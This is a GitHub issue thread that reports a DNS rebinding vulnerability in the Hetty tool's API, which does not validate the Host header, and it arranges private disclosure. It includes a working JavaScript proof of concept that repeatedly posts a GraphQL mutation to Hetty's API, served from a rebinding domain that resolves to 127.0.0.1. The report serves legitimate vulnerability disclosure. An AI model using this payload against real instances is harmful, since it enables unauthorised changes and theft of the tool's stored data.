DNS rebinding attacks on Hetty's API

[randomstuff]

Describe the bug

Hetty is vulnerable to DNS rebinding attacks because it does not validate the Host header.

A malicious remote server could exploit this to:

• trigger arbitrary HTTP requests to other hosts from the Hetty server (see could be used to attack services on the local network, localhost or internet);
• exfiltrate confidential data stored in Hetty.

Tested on 100.0a1 (2022-03-23).

I believe recent versions of Chrome are somehow protected against these type of attacks.

See as well https://www.gabriel.urdhr.fr/tags/dns-rebinding/ for more details in the context of other applications.

To Reproduce

function sleep(delay)
{
  return new Promise((resolve, reject) => {
    setTimeout(resolve, delay);
  });
}
async function main()
{
  while(true) {
    try {
        const response = await fetch("/api/graphql/", {
        method: "POST",
        headers: {
            "Content-Type": "application/json",
        },
        body: `{"operationName":"CreateProject","variables":{"name":"ddd"},"query":"mutation CreateProject($name: String!) {\\n  createProject(name: $name) {\\n id\\n    name\\n    __typename\\n  }\\n}"}`
        });
        if (response.status == 200) {
        alert("DONE!?")
        return;
        }
    }
    catch(e) {
    }
    await sleep(1000);
  }
}
main();

Served from a remote webserver such as:

http://a.192.0.2.1.1time.127.0.0.1.forever.9b173d68-dac5-4377-ba53-7a6473d130fe.rebind.network:8080/

Expected behavior

Request coming from another origin should be rejected.

Screenshots

Desktop (please complete the following information):

Smartphone (please complete the following information):

Additional context

[dstotijn]

Could you mail me at [email protected] please?

[randomstuff]

Done.

[AkechiShiro]

Is this security issue critical or what is the severity why was there no news about it since the 5th May ?
Is it perhaps fixed?

[randomstuff]

See #108.